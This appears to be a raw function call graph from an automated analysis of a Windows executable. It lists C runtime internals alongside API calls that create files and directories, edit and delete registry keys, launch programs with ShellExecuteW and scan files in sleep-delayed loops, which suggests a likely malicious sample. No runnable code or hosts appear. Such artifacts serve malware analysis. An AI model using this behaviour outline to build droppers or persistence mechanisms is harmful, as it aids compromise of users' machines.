LeaveCriticalSection 10578->10581 10580 1003aa9 10580->10492 10581->10580 10583 1003b7d __ioinit 10582->10583 10584 1005cb2 __lock 69 API calls 10583->10584 10585 1003b84 10584->10585 10587 10032df __decode_pointer 7 API calls 10585->10587 10591 1003c3d __initterm 10585->10591 10589 1003bbb 10587->10589 10589->10591 10593 10032df __decode_pointer 7 API calls 10589->10593 10590 1003c85 __ioinit 10590->10051 10599 1003c88 10591->10599 10598 1003bd0 10593->10598 10594 1003c7c 10595 1003a81 _malloc 3 API calls 10594->10595 10595->10590 10596 10032d6 7 API calls __init_pointers 10596->10598 10597 10032df 7 API calls __decode_pointer 10597->10598 10598->10591 10598->10596 10598->10597 10600 1003c8e 10599->10600 10602 1003c69 10599->10602 10604 1005bd8 LeaveCriticalSection 10600->10604 10602->10590 10603 1005bd8 LeaveCriticalSection 10602->10603 10603->10594 10604->10602 13318 1002a9d 13319 1002aa2 13318->13319 13320 1002ced 659 API calls 13319->13320 13321 1002ab2 13320->13321 13834 100876b 13841 100aa44 13834->13841 13837 100877e 13839 1004117 ___free_lconv_num 69 API calls 13837->13839 13840 1008789 13839->13840 13854 100a96a 13841->13854 13843 1008770 13843->13837 13844 100a81b 13843->13844 13845 100a827 __ioinit 13844->13845 13846 1005cb2 __lock 69 API calls 13845->13846 13853 100a833 13846->13853 13847 100a89c 13895 100a8b1 13847->13895 13849 100a8a8 __ioinit 13849->13837 13851 100a871 DeleteCriticalSection 13852 1004117 ___free_lconv_num 69 API calls 13851->13852 13852->13853 13853->13847 13853->13851 13882 100b4ca 13853->13882 13855 100a976 __ioinit 13854->13855 13856 1005cb2 __lock 69 API calls 13855->13856 13863 100a985 13856->13863 13857 100aa1d 13872 100aa3b 13857->13872 13860 100aa29 __ioinit 13860->13843 13862 100a922 107 API calls __fflush_nolock 13862->13863 13863->13857 13863->13862 13864 10087cc 13863->13864 13869 100aa0c 13863->13869 13865 10087d9 13864->13865 13866 10087ef EnterCriticalSection 13864->13866 13867 1005cb2 __lock 69 API calls 13865->13867 13866->13863 13868 10087e2 13867->13868 13868->13863 13875 100883a 13869->13875 13871 100aa1a 13871->13863 13881 1005bd8 LeaveCriticalSection 13872->13881 13874 100aa42 13874->13860 13876 100884a 13875->13876 13877 100885d LeaveCriticalSection 13875->13877 13880 1005bd8 LeaveCriticalSection 13876->13880 13877->13871 13879 100885a 13879->13871 13880->13879 13881->13874 13883 100b4d6 __ioinit 13882->13883 13884 100b507 13883->13884 13885 100b4ea 13883->13885 13892 100b4ff __ioinit 13884->13892 13898 100878b 13884->13898 13886 10040ce __free_osfhnd 69 API calls 13885->13886 13888 100b4ef 13886->13888 13889 10043bb __wctomb_s_l 7 API calls 13888->13889 13889->13892 13892->13853 13991 1005bd8 LeaveCriticalSection 13895->13991 13897 100a8b8 13897->13849 13899 100879d 13898->13899 13900 10087bf EnterCriticalSection 13898->13900 13899->13900 13901 10087a5 13899->13901 13902 10087b5 13900->13902 13903 1005cb2 __lock 69 API calls 13901->13903 13904 100b453 13902->13904 13903->13902 13905 100b467 13904->13905 13906 100b483 13904->13906 13907 10040ce __free_osfhnd 69 API calls 13905->13907 13910 100b47c 13906->13910 13923 100a8ba 13906->13923 13909 100b46c 13907->13909 13912 10043bb __wctomb_s_l 7 API calls 13909->13912 13920 100b53e 13910->13920 13912->13910 13915 1008869 __fileno 69 API calls 13916 100b49d 13915->13916 13933 100b72d 13916->13933 13918 100b4a3 13918->13910 13919 1004117 ___free_lconv_num 69 API calls 13918->13919 13919->13910 13984 10087fe 13920->13984 13922 100b544 13922->13892 13924 100a8d3 13923->13924 13925 100a8f5 13923->13925 13924->13925 13926 1008869 __fileno 69 API calls 13924->13926 13929 100b7fa 13925->13929 13927 100a8ee 13926->13927 13928 100852b __locking 103 API calls 13927->13928 13928->13925 13930 100b80a 13929->13930 13932 100b497 13929->13932 13931 1004117 ___free_lconv_num 69 API calls 13930->13931 13930->13932 13931->13932 13932->13915 13934 100b739 __ioinit 13933->13934 13935 100b741 13934->13935 13936 100b75c 13934->13936 13938 10040e1 __free_osfhnd 69 API calls 13935->13938 13937 100b76a 13936->13937 13942 100b7ab 13936->13942 13939 10040e1 __free_osfhnd 69 API calls 13937->13939 13940 100b746 13938->13940 13941 100b76f 13939->13941 13943 10040ce __free_osfhnd 69 API calls 13940->13943 13944 10040ce __free_osfhnd 69 API calls 13941->13944 13945 100a657 ___lock_fhandle 70 API calls 13942->13945 13952 100b74e __ioinit 13943->13952 13946 100b776 13944->13946 13947 100b7b1 13945->13947 13948 10043bb __wctomb_s_l 7 API calls 13946->13948 13949 100b7cc 13947->13949 13950 100b7be 13947->13950 13948->13952 13951 10040ce __free_osfhnd 69 API calls 13949->13951 13956 100b691 13950->13956 13954 100b7c6 13951->13954 13952->13918 13971 100b7f0 13954->13971 13957 100a5e0 __close_nolock 69 API calls 13956->13957 13958 100b6a1 13957->13958 13959 100b6f7 13958->13959 13961 100b6d5 13958->13961 13964 100a5e0 __close_nolock 69 API calls 13958->13964 13974 100a55a 13959->13974 13961->13959 13962 100a5e0 __close_nolock 69 API calls 13961->13962 13965 100b6e1 CloseHandle 13962->13965 13967 100b6cc 13964->13967 13965->13959 13969 100b6ed GetLastError 13965->13969 13966 100b721 13966->13954 13968 100a5e0 __close_nolock 69 API calls 13967->13968 13968->13961 13969->13959 13970 10040f4 __dosmaperr 69 API calls 13970->13966 13983 100a6f7 LeaveCriticalSection 13971->13983 13973 100b7f8 13973->13952 13975 100a5c6 13974->13975 13976 100a56b 13974->13976 13977 10040ce __free_osfhnd 69 API calls 13975->13977 13976->13975 13981 100a596 13976->13981 13978 100a5cb 13977->13978 13979 10040e1 __free_osfhnd 69 API calls 13978->13979 13980 100a5bc 13979->13980 13980->13966 13980->13970 13981->13980 13982 100a5b6 SetStdHandle 13981->13982 13982->13980 13983->13973 13985 100882e LeaveCriticalSection 13984->13985 13986 100880f 13984->13986 13985->13922 13986->13985 13987 1008816 13986->13987 13990 1005bd8 LeaveCriticalSection 13987->13990 13989 100882b 13989->13922 13990->13989 13991->13897 14245 10011f6 14246 10011fd 14245->14246 14247 1001209 RegOpenKeyExW 14246->14247 14248 100120b RegOpenKeyExW 14246->14248 14251 1001229 14247->14251 14248->14251 14250 100125d 14251->14250 14252 1001237 RegCreateKeyExW 14251->14252 14253 1001236 RegCreateKeyExW 14251->14253 14252->14250 14253->14250 10605 10029fb 10607 1002a00 10605->10607 10606 1002a35 SHGetKnownFolderPath 10608 1002a4f 10606->10608 10607->10606 10612 1002a10 10607->10612 10613 1001460 10608->10613 10614 1001475 10613->10614 10688 1002b10 10614->10688 10617 10014a4 10618 1002b10 103 API calls 10617->10618 10619 10014bd CreateDirectoryW 10618->10619 10621 10014d7 10619->10621 10622 1002b10 103 API calls 10621->10622 10623 10014f1 CreateFileW 10622->10623 10627 1001521 10623->10627 10625 1001570 10626 1001575 10625->10626 10628 1001574 10625->10628 10629 100158d 10626->10629 10630 1002b10 103 API calls 10626->10630 10627->10625 10631 100154b WriteFile 10627->10631 10638 1002b10 103 API calls 10628->10638 10632 1001593 CreateFileW 10629->10632 10633 1001595 CreateFileW 10629->10633 10630->10629 10634 100155b 10631->10634 10635 100155e CloseHandle 10631->10635 10643 10015bc 10632->10643 10633->10643 10634->10635 10636 100155d 10634->10636 10635->10625 10637 100156d 10635->10637 10636->10635 10637->10625 10642 100156f 10637->10642 10638->10629 10639 1001605 10644 1002b10 103 API calls 10639->10644 10641 10015be 10641->10641 10642->10628 10643->10639 10643->10641 10646 10015e5 WriteFile 10643->10646 10645 1001622 CreateFileW 10644->10645 10651 1001652 10645->10651 10648 10015f6 10646->10648 10649 10015f8 CloseHandle 10646->10649 10648->10649 10649->10639 10650 100169a 10652 1002b10 103 API calls 10650->10652 10651->10650 10653 100167a WriteFile 10651->10653 10654 10016b6 CreateFileW 10652->10654 10655 100168a 10653->10655 10656 100168d CloseHandle 10653->10656 10660 10016e5 10654->10660 10655->10656 10658 100168c 10655->10658 10656->10650 10658->10656 10659 100172e 10661 1002b7c ___convertcp 5 API calls 10659->10661 10660->10659 10663 100170e WriteFile 10660->10663 10662 1001738 10661->10662 10667 1002ced 10662->10667 10664 1001721 CloseHandle 10663->10664 10665 100171e 10663->10665 10664->10659 10665->10664 10666 1001720 10665->10666 10666->10664 10668 1002d01 10667->10668 10669 1002d1d 10667->10669 10670 10040ce __free_osfhnd 69 API calls 10668->10670 10671 100337a ___set_flsgetvalue 9 API calls 10669->10671 10672 1002d06 10670->10672 10673 1002d23 10671->10673 10674 10043bb __wctomb_s_l 7 API calls 10672->10674 10675 10041ea __calloc_crt 69 API calls 10673->10675 10684 1002d16 10674->10684 10676 1002d2f 10675->10676 10677 1002d81 10676->10677 10679 1003568 __getptd 69 API calls 10676->10679 10678 1004117 ___free_lconv_num 69 API calls 10677->10678 10680 1002d87 10678->10680 10681 1002d3c 10679->10681 10683 10040f4 __dosmaperr 69 API calls 10680->10683 10680->10684 10682 1003408 __getptd_noexit 69 API calls 10681->10682 10685 1002d45 CreateThread 10682->10685 10683->10684 10684->10612 10685->10684 10687 1002d78 GetLastError 10685->10687 10943 1002c6a 10685->10943 10687->10677 10689 100148f CreateDirectoryW 10688->10689 10691 1002f20 10688->10691 10689->10617 10694 1002e95 10691->10694 10695 1002ea2 10694->10695 10696 1002ebf 10694->10696 10698 10040ce __free_osfhnd 69 API calls 10695->10698 10697 1002ecc 10696->10697 10699 1002ed9 10696->10699 10700 10040ce __free_osfhnd 69 API calls 10697->10700 10701 1002ea7 10698->10701 10709 1002d9d 10699->10709 10704 1002ed1 10700->10704 10702 10043bb __wctomb_s_l 7 API calls 10701->10702 10707 1002eb7 10702->10707 10706 10043bb __wctomb_s_l 7 API calls 10704->10706 10706->10707 10707->10689 10708 10040ce __free_osfhnd 69 API calls 10708->10704 10710 1002dcd 10709->10710 10711 1002dad 10709->10711 10714 1002ddd 10710->10714 10720 1002dfd 10710->10720 10712 10040ce __free_osfhnd 69 API calls 10711->10712 10713 1002db2 10712->10713 10715 10043bb __wctomb_s_l 7 API calls 10713->10715 10716 10040ce __free_osfhnd 69 API calls 10714->10716 10722 1002dc2 10715->10722 10717 1002de2 10716->10717 10718 10043bb __wctomb_s_l 7 API calls 10717->10718 10718->10722 10719 1002e44 10719->10722 10723 10043e1 __flsbuf 103 API calls 10719->10723 10720->10719 10720->10722 10724 10043e1 10720->10724 10722->10707 10722->10708 10723->10722 10745 1008869 10724->10745 10727 1004413 10730 1004417 10727->10730 10739 1004424 __flsbuf 10727->10739 10728 10043fc 10729 10040ce __free_osfhnd 69 API calls 10728->10729 10738 1004401 10729->10738 10731 10040ce __free_osfhnd 69 API calls 10730->10731 10731->10738 10732 1004485 10733 1004514 10732->10733 10734 1004494 10732->10734 10735 100852b __locking 103 API calls 10733->10735 10736 10044ab 10734->10736 10741 10044c8 10734->10741 10735->10738 10763 100852b 10736->10763 10738->10719 10739->10732 10739->10738 10742 100447a 10739->10742 10751 1008650 10739->10751 10741->10738 10788 1007cdf 10741->10788 10742->10732 10760 1008607 10742->10760 10746 10043f1 10745->10746 10747 1008878 10745->10747 10746->10727 10746->10728 10748 10040ce __free_osfhnd 69 API calls 10747->10748 10749 100887d 10748->10749 10750 10043bb __wctomb_s_l 7 API calls 10749->10750 10750->10746 10752 100866c 10751->10752 10753 100865d 10751->10753 10755 1008690 10752->10755 10756 10040ce __free_osfhnd 69 API calls 10752->10756 10754 10040ce __free_osfhnd 69 API calls 10753->10754 10757 1008662 10754->10757 10755->10742 10758 1008680 10756->10758 10757->10742 10759 10043bb __wctomb_s_l 7 API calls 10758->10759 10759->10755 10761 10041a5 __malloc_crt 69 API calls 10760->10761 10762 100861c 10761->10762 10762->10732 10764 1008537 __ioinit 10763->10764 10765 100855a 10764->10765 10766 100853f 10764->10766 10768 1008568 10765->10768 10771 10085a9 10765->10771 10820 10040e1 10766->10820 10770 10040e1 __free_osfhnd 69 API calls 10768->10770 10773 100856d 10770->10773 10823 100a657 10771->10823 10772 10040ce __free_osfhnd 69 API calls 10781 100854c __ioinit 10772->10781 10775 10040ce __free_osfhnd 69 API calls 10773->10775 10776 1008574 10775->10776 10778 10043bb __wctomb_s_l 7 API calls 10776->10778 10777 10085af 10779 10085d2 10777->10779 10780 10085bc 10777->10780 10778->10781 10783 10040ce __free_osfhnd 69 API calls 10779->10783 10833 1007df8 10780->10833 10781->10738 10785 10085d7 10783->10785 10784 10085ca 10892 10085fd 10784->10892 10786 10040e1 __free_osfhnd 69 API calls 10785->10786 10786->10784 10789 1007ceb __ioinit 10788->10789 10790 1007d18 10789->10790 10791 1007cfc 10789->10791 10793 1007d26 10790->10793 10795 1007d47 10790->10795 10792 10040e1 __free_osfhnd 69 API calls 10791->10792 10794 1007d01 10792->10794 10796 10040e1 __free_osfhnd 69 API calls 10793->10796 10799 10040ce __free_osfhnd 69 API calls 10794->10799 10797 1007d67 10795->10797 10798 1007d8d 10795->10798 10800 1007d2b 10796->10800 10802 10040e1 __free_osfhnd 69 API calls 10797->10802 10803 100a657 ___lock_fhandle 70 API calls 10798->10803 10814 1007d09 __ioinit 10799->10814 10801 10040ce __free_osfhnd 69 API calls 10800->10801 10804 1007d32 10801->10804 10805 1007d6c 10802->10805 10806 1007d93 10803->10806 10807 10043bb __wctomb_s_l 7 API calls 10804->10807 10808 10040ce __free_osfhnd 69 API calls 10805->10808 10809 1007da0 10806->10809 10810 1007dbc 10806->10810 10807->10814 10813 1007d73 10808->10813 10811 1007c5a __lseeki64_nolock 71 API calls 10809->10811 10812 10040ce __free_osfhnd 69 API calls 10810->10812 10815 1007db1 10811->10815 10816 1007dc1 10812->10816 10817 10043bb __wctomb_s_l 7 API calls 10813->10817 10814->10738 10939 1007dee 10815->10939 10818 10040e1 __free_osfhnd 69 API calls 10816->10818 10817->10814 10818->10815 10821 10034ef __getptd_noexit 69 API calls 10820->10821 10822 10040e6 10821->10822 10822->10772 10824 100a663 __ioinit 10823->10824 10825 100a6be 10824->10825 10827 1005cb2 __lock 69 API calls 10824->10827 10826 100a6c3 EnterCriticalSection 10825->10826 10828 100a6e0 __ioinit 10825->10828 10826->10828 10829 100a68f 10827->10829 10828->10777 10830 100a6a6 10829->10830 10832 1006ad5 __ioinit InitializeCriticalSectionAndSpinCount 10829->10832 10895 100a6ee 10830->10895 10832->10830 10834 1007e07 __write_nolock 10833->10834 10835 1007e60 10834->10835 10836 1007e39 10834->10836 10859 1007e2e 10834->10859 10839 1007ec8 10835->10839 10840 1007ea2 10835->10840 10838 10040e1 __free_osfhnd 69 API calls 10836->10838 10837 1002b7c ___convertcp 5 API calls 10841 1008529 10837->10841 10842 1007e3e 10838->10842 10844 1007edc 10839->10844 10899 1007c5a 10839->10899 10843 10040e1 __free_osfhnd 69 API calls 10840->10843 10841->10784 10845 10040ce __free_osfhnd 69 API calls 10842->10845 10846 1007ea7 10843->10846 10849 1008650 __flsbuf 69 API calls 10844->10849 10848 1007e45 10845->10848 10850 10040ce __free_osfhnd 69 API calls 10846->10850 10851 10043bb __wctomb_s_l 7 API calls 10848->10851 10852 1007ee7 10849->10852 10854 1007eb0 10850->10854 10851->10859 10853 100818d 10852->10853 10909 1003568 10852->10909 10856 100845c WriteFile 10853->10856 10857 100819d 10853->10857 10855 10043bb __wctomb_s_l 7 API calls 10854->10855 10855->10859 10862 100816f 10856->10862 10863 100848f GetLastError 10856->10863 10860 100827b 10857->10860 10882 10081b1 10857->10882 10859->10837 10880 100835b 10860->10880 10884 100828a 10860->10884 10862->10859 10864 10084da 10862->10864 10868 10084ad 10862->10868 10863->10862 10864->10859 10867 10040ce __free_osfhnd 69 API calls 10864->10867 10865 1007f2d 10865->10853 10866 1007f3f GetConsoleCP 10865->10866 10866->10862 10890 1007f62 10866->10890 10870 10084fd 10867->10870 10872 10084b8 10868->10872 10873 10084cc 10868->10873 10869 100821f WriteFile 10869->10863 10869->10882 10877 10040e1 __free_osfhnd 69 API calls 10870->10877 10871 10083c1 WideCharToMultiByte 10871->10863 10874 10083f8 WriteFile 10871->10874 10878 10040ce __free_osfhnd 69 API calls 10872->10878 10917 10040f4 10873->10917 10874->10880 10881 100842f GetLastError 10874->10881 10875 10082ff WriteFile 10875->10863 10875->10884 10877->10859 10879 10084bd 10878->10879 10883 10040e1 __free_osfhnd 69 API calls 10879->10883 10880->10862 10880->10864 10880->10871 10880->10874 10881->10880 10882->10862 10882->10864 10882->10869 10883->10859 10884->10862 10884->10864 10884->10875 10886 100800e WideCharToMultiByte 10886->10862 10888 100803f WriteFile 10886->10888 10887 1008be2 81 API calls __fassign 10887->10890 10888->10863 10888->10890 10889 100a71e 11 API calls __putwch_nolock 10889->10890 10890->10862 10890->10863 10890->10886 10890->10887 10890->10889 10891 1008093 WriteFile 10890->10891 10914 1008c34 10890->10914 10891->10863 10891->10890 10938 100a6f7 LeaveCriticalSection 10892->10938 10894 1008605 10894->10781 10898 1005bd8 LeaveCriticalSection 10895->10898 10897 100a6f5 10897->10825 10898->10897 10922 100a5e0 10899->10922 10901 1007c78 10902 1007c80 10901->10902 10903 1007c91 SetFilePointer 10901->10903 10905 10040ce __free_osfhnd 69 API calls 10902->10905 10904 1007ca9 GetLastError 10903->10904 10907 1007c85 10903->10907 10906 1007cb3 10904->10906 10904->10907 10905->10907 10908 10040f4 __dosmaperr 69 API calls 10906->10908 10907->10844 10908->10907 10910 10034ef __getptd_noexit 69 API calls 10909->10910 10911 1003570 10910->10911 10912 100357d GetConsoleMode 10911->10912 10913 1003a2d __amsg_exit 69 API calls 10911->10913 10912->10853 10912->10865 10913->10912 10935 1008bfc 10914->10935 10918 10040e1 __free_osfhnd 69 API calls 10917->10918 10919 10040ff _realloc 10918->10919 10920 10040ce __free_osfhnd 69 API calls 10919->10920 10921 1004112 10920->10921 10921->10859 10923 100a605 10922->10923 10924 100a5ed 10922->10924 10927 10040e1 __free_osfhnd 69 API calls 10923->10927 10929 100a64a 10923->10929 10925 10040e1 __free_osfhnd 69 API calls 10924->10925 10926 100a5f2 10925->10926 10928 10040ce __free_osfhnd 69 API calls 10926->10928 10930 100a633 10927->10930 10931 100a5fa 10928->10931 10929->10901 10932 10040ce __free_osfhnd 69 API calls 10930->10932 10931->10901 10933 100a63a 10932->10933 10934 10043bb __wctomb_s_l 7 API calls 10933->10934 10934->10929 10936 1004545 _LocaleUpdate::_LocaleUpdate 79 API calls 10935->10936 10937 1008c0f 10936->10937 10937->10890 10938->10894 10942 100a6f7 LeaveCriticalSection 10939->10942 10941 1007df6 10941->10814 10942->10941 10944 100337a ___set_flsgetvalue 9 API calls 10943->10944 10945 1002c75 10944->10945 10956 100335a TlsGetValue 10945->10956 10947 1002c80 10948 1002cae 10947->10948 10958 10033ae 10947->10958 10951 1002ca4 GetCurrentThreadId 10953 1002cc9 __IsNonwritableInCurrentImage 10951->10953 10952 1002c97 GetLastError ExitThread 10961 1002c29 10953->10961 10957 1003370 10956->10957 10957->10947 10959 10032df __decode_pointer 7 API calls 10958->10959 10960 1002c93 10959->10960 10960->10951 10960->10952 10962 1002c35 __ioinit 10961->10962 10963 1003568 __getptd 69 API calls 10962->10963 10964 1002c3a 10963->10964 10991 1001ea7 10964->10991 11068 1001ba6 10964->11068 11168 1001906 10964->11168 11286 1001ec4 10964->11286 11363 1001941 10964->11363 11474 1001740 10964->11474 11597 100186a 10964->11597 11712 100180c 10964->11712 11829 1001f50 10964->11829 11898 1001cff 10964->11898 11987 10018dc 10964->11987 12099 1001ffa 10964->12099 12162 1001a1a 10964->12162 12269 100175a 10964->12269 12391 1002199 10964->12391 12450 10017f8 10964->12450 12567 1001dd8 10964->12567 12648 1001d93 10964->12648 12726 1001953 10964->12726 12844 10019d1 10964->12844 12958 1001dcf 10964->12958 10965 1002c44 13039 1002bec 10965->13039 10994 1001e3e 10991->10994 10992 1001ec0 Sleep 10992->10994 10993 1001ea2 GetFileAttributesW 10993->10994 10994->10992 10994->10993 10995 1001ed2 Sleep 10994->10995 10997 1002b10 103 API calls 10994->10997 11008 1001e93 10994->11008 10996 1001edf 10995->10996 13046 1001270 10996->13046 10997->10994 11000 1001270 5 API calls 11001 1001f19 Sleep 11000->11001 13056 1001330 11001->13056 11004 100215f FindNextFileW 11005 100217b FindClose 11004->11005 11004->11008 11009 1002188 _memset 11005->11009 11006 1002b7c ___convertcp 5 API calls 11007 1001f47 11006->11007 11007->10965 11008->11004 13070 1002b40 11008->13070 11010 1002b10 103 API calls 11009->11010 11011 10021cc GetFileAttributesW 11010->11011 11012 10021ed RegOpenKeyExW 11011->11012 11015 100221b RegOpenKeyExW 11012->11015 11017 1002282 RegOpenKeyExW 11015->11017 11019 10022e3 RegOpenKeyExW 11017->11019 11021 10023a6 RegOpenKeyExW 11019->11021 11023 10023d4 ShellExecuteW Sleep 11021->11023 11025 100243e 11023->11025 11026 1002b10 103 API calls 11025->11026 11027 1002455 FindFirstFileW 11026->11027 11029 1002487 11027->11029 11030 1002b10 103 API calls 11029->11030 11031 100249f GetFileAttributesW 11030->11031 11033 1002554 11031->11033 11034 100265a FindNextFileW 11033->11034 11034->11033 11035 1002676 11034->11035 11036 1002b10 103 API calls 11035->11036 11037 10026a8 11036->11037 11038 1002b10 103 API calls 11037->11038 11039 10026c3 11038->11039 11069 1001ba9 11068->11069 11070 1002b10 103 API calls 11069->11070 11071 1001bc0 GetFileAttributesW 11070->11071 11072 1001c6d FindNextFileW 11071->11072 11073 1001b7b 11071->11073 11072->11073 11074 1001c89 11072->11074 11073->11072 11075 1002b10 103 API calls 11074->11075 11076 1001cbb 11075->11076 11077 1002b10 103 API calls 11076->11077 11078 1001cdb 11077->11078 11079 1001270 5 API calls 11078->11079 11080 1001cfc 11079->11080 11081 1001270 5 API calls 11080->11081 11082 1001d1c 11081->11082 11083 1001270 5 API calls 11082->11083 11084 1001d3b 11083->11084 11085 1001270 5 API calls 11084->11085 11086 1001d5b 11085->11086 11087 1001270 5 API calls 11086->11087 11088 1001d7a 11087->11088 11089 1001330 116 API calls 11088->11089 11090 1001d90 Sleep 11089->11090 11103 1001da5 11090->11103 11092 1001ed2 Sleep 11093 1001edf 11092->11093 11095 1001270 5 API calls 11093->11095 11094 1002b10 103 API calls 11094->11103 11096 1001efb 11095->11096 11097 1001270 5 API calls 11096->11097 11099 1001ea2 GetFileAttributesW 11099->11103 11102 1001ec0 Sleep 11102->11103 11103->11092 11103->11094 11103->11099 11103->11102 11108 1001e93 11103->11108 11104 100215f FindNextFileW 11105 100217b FindClose 11104->11105 11104->11108 11109 1002188 _memset 11105->11109 11108->11104 11113 1002b40 69 API calls 11108->11113 11113->11108 11169 100190b 11168->11169 11170 100190e RegDeleteKeyW 11168->11170 11169->11170 11171 100190d 11169->11171 11172 1001922 11170->11172 11173 1001925 RegDeleteKeyW 11170->11173 11172->11173 11174 1001939 11173->11174 11175 100193c RegCloseKey 11173->11175 11174->11175 11176 1001949 RegOpenKeyExW 11175->11176 11178 1001978 RegOpenKeyExW 11176->11178 11180 1001a27 ShellExecuteW 11178->11180 11182 1001a4e Sleep 11180->11182 11183 1001a5e 11182->11183 11184 1002b10 103 API calls 11183->11184 11185 1001a76 FindFirstFileW 11184->11185 11187 1001a9d 11185->11187 11188 1002b10 103 API calls 11187->11188 11189 1001abe GetFileAttributesW 11188->11189 11190 1001b75 11189->11190 11191 1001c6d FindNextFileW 11190->11191 11191->11190 11192 1001c89 11191->11192 11193 1002b10 103 API calls 11192->11193 11194 1001cbb 11193->11194 11195 1002b10 103 API calls 11194->11195 11196 1001cdb 11195->11196 11197 1001270 5 API calls 11196->11197 11198 1001cfc 11197->11198 11199 1001270 5 API calls 11198->11199 11200 1001d1c 11199->11200 11201 1001270 5 API calls 11200->11201 11202 1001d3b 11201->11202 11203 1001270 5 API calls 11202->11203 11290 1001e3e 11286->11290 11287 1001ea2 GetFileAttributesW 11287->11290 11288 1001ec0 Sleep 11288->11290 11289 1001ed2 Sleep 11291 1001edf 11289->11291 11290->11287 11290->11288 11290->11289 11292 1002b10 103 API calls 11290->11292 11298 1001e93 11290->11298 11293 1001270 5 API calls 11291->11293 11292->11290 11294 1001efb 11293->11294 11295 1001270 5 API calls 11294->11295 11296 1001f19 Sleep 11295->11296 11297 1001330 116 API calls 11296->11297 11299 1001f35 11297->11299 11300 100215f FindNextFileW 11298->11300 11308 1002b40 69 API calls 11298->11308 11302 1002b7c ___convertcp 5 API calls 11299->11302 11300->11298 11301 100217b FindClose 11300->11301 11304 1002188 _memset 11301->11304 11303 1001f47 11302->11303 11303->10965 11305 1002b10 103 API calls 11304->11305 11306 10021cc GetFileAttributesW 11305->11306 11307 10021ed RegOpenKeyExW 11306->11307 11310 100221b RegOpenKeyExW 11307->11310 11308->11298 11312 1002282 RegOpenKeyExW 11310->11312 11314 10022e3 RegOpenKeyExW 11312->11314 11316 10023a6 RegOpenKeyExW 11314->11316 11318 10023d4 ShellExecuteW Sleep 11316->11318 11320 100243e 11318->11320 11321 1002b10 103 API calls 11320->11321 11322 1002455 FindFirstFileW 11321->11322 11324 1002487 11322->11324 11325 1002b10 103 API calls 11324->11325 11326 100249f GetFileAttributesW 11325->11326 11328 1002554 11326->11328 11329 100265a FindNextFileW 11328->11329 11329->11328 11330 1002676 11329->11330 11331 1002b10 103 API calls 11330->11331 11332 10026a8 11331->11332 11333 1002b10 103 API calls 11332->11333 11334 10026c3 11333->11334 11335 1001270 5 API calls 11334->11335 11364 1001944 RegOpenKeyExW 11363->11364 11366 1001978 RegOpenKeyExW 11364->11366 11368 1001a27 ShellExecuteW 11366->11368 11370 1001a4e Sleep 11368->11370 11371 1001a5e 11370->11371 11372 1002b10 103 API calls 11371->11372 11373 1001a76 FindFirstFileW 11372->11373 11375 1001a9d 11373->11375 11376 1002b10 103 API calls 11375->11376 11377 1001abe GetFileAttributesW 11376->11377 11378 1001b75 11377->11378 11379 1001c6d FindNextFileW 11378->11379 11379->11378 11380 1001c89 11379->11380 11381 1002b10 103 API calls 11380->11381 11382 1001cbb 11381->11382 11383 1002b10 103 API calls 11382->11383 11384 1001cdb 11383->11384 11385 1001270 5 API calls 11384->11385 11386 1001cfc 11385->11386 11387 1001270 5 API calls 11386->11387 11388 1001d1c 11387->11388 11389 1001270 5 API calls 11388->11389 11390 1001d3b 11389->11390 11391 1001270 5 API calls 11390->11391 11392 1001d5b 11391->11392 11393 1001270 5 API calls 11392->11393 11394 1001d7a 11393->11394 11475 100174d __write_nolock 11474->11475 11476 100175c SHGetSpecialFolderPathW 11475->11476 11477 1001772 11476->11477 11478 1002b10 103 API calls 11477->11478 11479 10017eb GetFileAttributesW 11478->11479 11481 1001811 RegOpenKeyExW 11479->11481 11483 1001840 RegOpenKeyExW 11481->11483 11485 10018a5 RegOpenKeyExW 11483->11485 11487 1001900 RegOpenKeyExW 11485->11487 11489 1001978 RegOpenKeyExW 11487->11489 11491 1001a27 ShellExecuteW 11489->11491 11493 1001a4e Sleep 11491->11493 11494 1001a5e 11493->11494 11495 1002b10 103 API calls 11494->11495 11496 1001a76 FindFirstFileW 11495->11496 11498 1001a9d 11496->11498 11499 1002b10 103 API calls 11498->11499 11500 1001abe GetFileAttributesW 11499->11500 11501 1001b75 11500->11501 11502 1001c6d FindNextFileW 11501->11502 11502->11501 11503 1001c89 11502->11503 11504 1002b10 103 API calls 11503->11504 11505 1001cbb 11504->11505 11506 1002b10 103 API calls 11505->11506 11507 1001cdb 11506->11507 11508 1001270 5 API calls 11507->11508 11598 100186d RegOpenKeyExW 11597->11598 11600 10018a5 RegOpenKeyExW 11598->11600 11602 1001900 RegOpenKeyExW 11600->11602 11604 1001978 RegOpenKeyExW 11602->11604 11606 1001a27 ShellExecuteW 11604->11606 11608 1001a4e Sleep 11606->11608 11609 1001a5e 11608->11609 11610 1002b10 103 API calls 11609->11610 11611 1001a76 FindFirstFileW 11610->11611 11613 1001a9d 11611->11613 11614 1002b10 103 API calls 11613->11614 11615 1001abe GetFileAttributesW 11614->11615 11616 1001b75 11615->11616 11617 1001c6d FindNextFileW 11616->11617 11617->11616 11618 1001c89 11617->11618 11619 1002b10 103 API calls 11618->11619 11620 1001cbb 11619->11620 11621 1002b10 103 API calls 11620->11621 11622 1001cdb 11621->11622 11623 1001270 5 API calls 11622->11623 11624 1001cfc 11623->11624 11625 1001270 5 API calls 11624->11625 11626 1001d1c 11625->11626 11627 1001270 5 API calls 11626->11627 11628 1001d3b 11627->11628 11629 1001270 5 API calls 11628->11629 11713 100180f RegOpenKeyExW 11712->11713 11715 1001840 RegOpenKeyExW 11713->11715 11717 10018a5 RegOpenKeyExW 11715->11717 11719 1001900 RegOpenKeyExW 11717->11719 11721 1001978 RegOpenKeyExW 11719->11721 11723 1001a27 ShellExecuteW 11721->11723 11725 1001a4e Sleep 11723->11725 11726 1001a5e 11725->11726 11727 1002b10 103 API calls 11726->11727 11728 1001a76 FindFirstFileW 11727->11728 11730 1001a9d 11728->11730 11731 1002b10 103 API calls 11730->11731 11732 1001abe GetFileAttributesW 11731->11732 11733 1001b75 11732->11733 11734 1001c6d FindNextFileW 11733->11734 11734->11733 11735 1001c89 11734->11735 11736 1002b10 103 API calls 11735->11736 11737 1001cbb 11736->11737 11738 1002b10 103 API calls 11737->11738 11739 1001cdb 11738->11739 11740 1001270 5 API calls 11739->11740 11741 1001cfc 11740->11741 11742 1001270 5 API calls 11741->11742 11743 1001d1c 11742->11743 11744 1001270 5 API calls 11743->11744 11745 1001d3b 11744->11745 11831 1001f5d __write_nolock 11829->11831 11830 1001f6c SHGetSpecialFolderPathW 11832 1002b10 103 API calls 11830->11832 11831->11830 11833 1001f97 _memset 11832->11833 11834 1001fc3 FindFirstFileW 11833->11834 11848 1001fdf 11834->11848 11835 100215f 